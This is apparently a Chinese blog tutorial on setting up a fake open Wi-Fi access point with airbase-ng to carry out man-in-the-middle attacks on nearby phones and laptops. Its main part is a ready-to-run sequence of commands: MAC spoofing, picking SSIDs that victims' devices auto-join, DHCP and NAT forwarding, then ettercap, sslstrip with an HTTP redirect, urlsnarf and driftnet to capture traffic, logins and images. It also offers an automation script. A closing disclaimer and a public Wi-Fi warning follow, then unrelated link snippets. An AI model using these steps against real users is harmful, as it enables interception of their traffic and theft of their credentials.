利用airbase-ng建立Soft AP
利用airbase-ng建立Soft AP,再利用一些常见工具进行嗅探,或对抓包进行分析是出现比较早的一种MITM攻击方法。网上有很多关于手动实现的文章,也有一些自动实现脚本。这些脚本通常分两类,一类是一步一步让用户输入接口、选项什么的,最后再运行,每一次启动都要重复输入很多数据,低效且不爽。第二类是自动运行的,但可选项比较少,不符合自己的使用习惯。所以,在学习过程中自己写了一个自动实现脚本。
建立Soft AP可使用airbase-ng和hostapd,其中前者需要网卡支持monitor模式,是比较常用的工具,但仅支持OPN和WEP的,不支持WPA加密,不挑网卡,常见的RTL8187L既可。第二个是hostapd,需要网卡支持AP模式,8187L就用不了了,rt3070可以使用,支持建立OPN/WEP/WPA各种SoftAP。本文介绍基于airbase-ng的实现,毕竟这是个轻量级且各种hack可选项较多的常用工具。
建立soft Ap并进行嗅探,主要有如下4步:
1.airbase-ng建立热点
2.dhcpd启动dhcp服务
3.iptables设置好转发规则,使接入Soft AP客户的数据可正常访问互联网
4.启动嗅探工具收集信息
结束后,还可以对抓取的包进行后续分析。当然,中间还可以进行DNS劫持,伪造页面进行钓鱼,不在本文讨论范围。下面分步说。
准备工作:
(1) 一台电力比较持久的笔记本电脑,可以直接安装kali linux,也可以在VMware中安装kali。
(2)一块8187L网卡,山寨的就可以,性价比高,做工没看出来比原装的差在哪儿,只要保证中间芯片是真的就行。(下面照片中是原装的)
(3)天线:感觉7dbi的全向天线高度正好,再大就不方便了,而且9dbi的信号并未增强多少,反而损耗更大。方向性天线也不错,7db方向性天线体积很小巧,据说明在聚焦方向上可达10dbi全向天线的作用距离,用于室内空间较狭长时合适。穿墙能力就不说了,钢筋混凝土墙两堵,基本就很难接收可用信号了。
实测7dbi全向天线信号强度(无遮挡):65米处,-85dbm,50米处约-75dbm,10米之内信号稳定在-35dbm左右。该值非常粗略,仅供参考。一般能够正常通信的下限是-90dbm,上网的话要求更高。当然,信号强度也和接收装置的天线有关,不过总体上说,8187L加上7dbi的两种天线基本够用了,覆盖一个公共场所不大室内空间没问题。

(4)笔记本有internet网接入,用于将Fake AP接收的信息转到internet上去,不多赘述。
(5)启动monitor模式,并伪造一下本机的网卡地址 [wlan1要根据interface下的具体名字来]
airmon-ng start wlan1
ifconfig wlan1 down
macchanger –r wlan1
ifconfig wlan1 up
ifconfig mon0 down
macchanger –r mon0
ifconfig mon0 up
失败执行:airmon-ng check kill
一、使用airbase-ng建立OPN的Soft AP
airbase-ng主要用于建立OPN的AP,也就是不需要密码的公开AP。WEP加密的已经很少见了,不支持WPA加密。这一步中,最关键的是AP的ssid,ssid决定了AP欺骗性,也就是被连接的可能性。现在手机、平板电脑的客户端会自动记录连接过的AP信息,保存在/data/misc/wifi/wpa_suppliant.conf中,每个热点保存四个信息:ssid、psk(密码)、key_mgmt(加密方式)、priority(优先级)。注意,其中不含网卡的硬件地址.所以,只需前三项对上,便可自动连接。
手机wifi功能打开时,会不断向外发送probe信息包,里面包含ssid。可用airodump-ng查看当前网络环境下有哪些被probe的ssid,供伪造ssid时参考。
选定名称后,便可使用airbase-ng建立Fake AP了:
airbase-ng $FAKE_AP_INTERFACE -e $FAKE_AP_ESSID -c
airbase-ng运行成功后,ifconfig查看,会多出一个at0接口。
root@mKL:~# ifconfig
at0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx
inet addr:10.0.0.1 Bcast:10.0.0.255 Mask:255.255.255.0
…
eth0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx
inet addr:10.10.10.138 Bcast:10.10.10.255 Mask:255.255.255.0
…
二、使用dhcpd启动dhcp服务
客户端连接上SoftAP后,要给他们分配IP地址。这里有一条最关键,就是SoftAP的IP地址和Internet接口的IP地址不能在网一个段。比如,连接Internet网的网卡eth0,地址是10.10.10.138/24,则at0的地址后面不能设置为同一网段,这里设置为10.0.0.1/24。
首先建立dhcpd.conf,内容包含dhcp服务运行的设置参数,关键代码如下:
echo -n "[+]now creating dhcpd.conf..."
cat >$SESSION_PATH/dhcpd.conf<<-EOF
authoritative;
default-lease-time 6000;
max-lease-time 12000;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.30 10.0.0.60;
option routers 10.0.0.1;
option broadcast-address 10.0.0.255;
option subnet-mask 255.255.255.0;
option domain-name-servers 8.8.8.8;
allow unknown-clients;
}
EOF
echo "done"
这些选项的意义就不一一介绍了,比较重要的时option routers,网关的设置,后续at0的地址要设置为该网关地址。option domain-name-servers,设置DNS服务器地址,8.8.8.8是比较通用的值。
接下来然后需要将SoftAP的接口,也就是airbase-ng创建的at0设置为该网段的网关:
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1500
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
接着启动dhcp服务
dhcpd -d -f -cf $SESSION_PATH/dhcpd.conf at0
三、使用iptables设置转发
使用iptables设置转发,将用户连接SoftAP后的数据,转发到internet上,是非常关键的一步。网上各种版本很多,其实最简单的实现就一句指令:
iptables -t nat -A POSTROUTING --out-interface $FAKE_AP_INTERNET -j MASQUERADE #$FAKE_AP_INTERNET是外网接口
注意,转发生效需要本机开启ip_forward功能。指令是:
echo "1" > /proc/sys/net/ipv4/ip_forward
由于后面运行ettercap时,会将该值再次变为0,所以等ettercap运行后再执行上述命令。
四、运行各种嗅探工具
SoftAP建立并运行dhcp服务后,客户端就可以根据我们设定的规则连接上热点并正常浏览网页,运行各个程序了。接下来,就是针对Soft AP的接口at0,执行各种嗅探:
ettercap -Tzq -i $FAKE_AP_AT_INTERFACE -w $SESSION_PATH/etter.pcap -L $SESSION_PATH/etter
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port $SSLSTRIP_PORT
sslstrip -pkf -l $SSLSTRIP_PORT -w $SESSION_PATH/sslstrip.log 2>/dev/null
urlsnarf -i $1 | grep http > $SESSION_PATH/url.txt
tail -f $SESSION_PATH/url.txt
driftnet -i $1 -d $SESSION_PATH/
以上就是实现基于Soft AP的MITM攻击的几个关键步骤。
这里提供一个自动执行脚本auto_opnAP.sh,最简单的执行命令是:
auto_opnAP.sh -e xxxx -sud -i mon0 -n eth0
运行界面如下图所示:

总体上看,现在大多数手机客户端在安全上都有考虑,用户名、密码以明文直接出现的不多,特别是大企业开发的工具,但还是有部分小企业的软件在这方面不太重视。同时,尽管客户端连接时对信息进行了加密,但用浏览器登录时,由于遵循http协议,部分情况下用户名和密码更容易泄漏。所以,在公共场所使用免费WiFi时,还是要甄别热点的真假,并尽量少进行关键操作。
声明:本文旨在讨论原理,提高安全意识,提供的脚本也仅供学习交流,本文所有测试均在自家局域网络测试,请勿非法使用。有好的修改建议,欢迎交流
利用airbase-ng建立Soft AP的更多相关文章
- Visual C++ 编程实现Soft AP (HostedNetwork / 承载网络) 功能
从Windows 7开始,微软在操作系统中加入的Soft AP功能,使用户能够通过无线网卡,开启虚拟AP,从而实现网络共享.Soft AP又称HostedNetwork(承载网络),在Windows ...
- [Tool]利用Advanced Installer建立x86/x64在一起的安装程式
原文 [Tool]利用Advanced Installer建立x86/x64在一起的安装程式 之前使用InstallShield做安装程式时,如果要将程式放在Program Files的话,需要分别针 ...
- 在Ubuntu中开启Soft AP功能
在Ubuntu中开启Soft AP功能 1.查看采用的无线网卡是否支持Soft AP: 注意,可以看到有AP字样,表明支持.楼主比较背,在易迅上挑了个销量最高的netcore nw360,结果无法搭建 ...
- 用shell脚本实现linux系统上wifi模式(STA和soft AP)的转换
转载请注明出处:http://blog.csdn.net/hellomxj1/ 功能:在linux系统上实现wifi STA与AP功能的转换 实现成果:1.加入wifipassword账户add_wi ...
- 利用NET HUNTER建立一个自动文件下载的网络接入点
免责声明:本文旨在分享技术进行安全学习,禁止非法利用. 本文中我将完整的阐述如何通过建立一个非常邪恶的网络接入点来使得用户进行自动文件下载.整个过程中我将使用 Nexus 9 来运行Kali NetH ...
- iodine免费上网——本质就是利用dns tunnel建立tcp,然后tcp proxy来实现通过访问虚拟dns0网卡来访问你的dns 授权server
我的命令: server端: sudo iodined -P passwd -f -DD 10.0.0.100 abc.com client端(直连模式,-r表示使用xxx.abc.com的xxx来转 ...
- 【原创】Capture CIS利用Access数据库建立封装库说明
1.在服务器端建立新空间,方便封装库以及数据库的归档存放 服务器路径:\\192.168.1.234\Share\STG_LIB,文件夹内容如下,其中Datesheet存放物料数据手册,Pcb_Lib ...
- ubuntu建立软ap共享无线网络
建立ad-hoc模式共享网络 viewtopic.php?f=116&t=387194 有些android手机可能不支持ad-hoc模式,要第三方rom才行. 首先安装这些工具 代码: apt ...
- 利用ARIMA算法建立短期预测模型
周五福利日活动是电信为回馈老用户而做的活动,其主要回馈老用户的方式是让用户免费领取对应的优惠券,意在提升老用户的忠诚度和活跃度.今日,为保证仓库备货优惠券资源充足,特别是5元话费券等,需要对该类优惠券 ...
随机推荐
- 为什么很多应用都安装在/usr/local目录下?
首先,Linux的官方文档FHS对该目录的说明:http://www.linuxbase.org/betaspecs/fhs/fhs/ch04s09.html The /usr/local hiera ...
- JavaScript定义函数
函数声明 一个函数定义(也称为函数声明,或函数语句)由一系列的function关键字组成,依次为: 1函数的名称. 2函数参数列表,包围在括号中并由逗号分隔. 3定义函数的 JavaScript 语句 ...
- node.js官方文档解析 02—buffer 缓冲器
Buffer 类的实例类似于整数数组,但 Buffer 的大小是固定的.且在 V8 堆外分配物理内存.Buffer 的大小在被创建时确定,且无法调整. Buffer 类在 Node.js 中是一个全局 ...
- __x__(19)0907第四天__ HTML5 文本标签 及 样式
strong 表语义上的强调, em 表示语气上的强调: <strong>警告:离僵尸远点!</strong> 世界末日了,因为僵尸是<em>有毒的</em& ...
- jdk1.8的环境下打包成jdk1.6
第一步: 选中项目 ------->properties 第二部:(修改java build path和java conpiler) 第三部:需要打包成jdk6的jar包,就改成jre6. 注意 ...
- 2019.3.23 python的unittest框架与requests
(明天学测试用例集合及输出测试报告!!!) import unittest import requests import json class Test_get(unittest.TestCase): ...
- 小甲鱼零基础python课后题 P21 020函数:内嵌函数和闭包函数
测试题 0.如果希望在函数中修改全局变量的值,应该使用什么关键字? 答:globe 1.在嵌套函数中,如果希望在内部函数修改外部函数的局部变量,应该使用什么关键字? 答:nonlocal 2.pyth ...
- Gym 101606B - Breaking Biscuits - [凸包+旋转卡壳][凸包的宽度]
题目链接:https://codeforces.com/gym/101606/problem/B 题解: 对于给出的 $n$ 个点,先求这些点的凸包,然后用旋转卡壳求出凸包的宽度(Width (min ...
- csrf jsonp
网站b中包含向网站a发送的请求,那么网站b就会获得网站a的cookie,网站a登录了则网站b的cookie中会有网站a的sessionid,此时如果网站a对外提供需要sessionid的jsonp接口 ...
- 解决python tkinter 与 sleep 延迟问题
多线程(threading——join) join ()方法:主线程A中,创建了子线程B,并且在主线程A中调用了B.join(),那么,主线程A会在调用的地方等待,直到子线程B完成操作后, 才可以接着 ...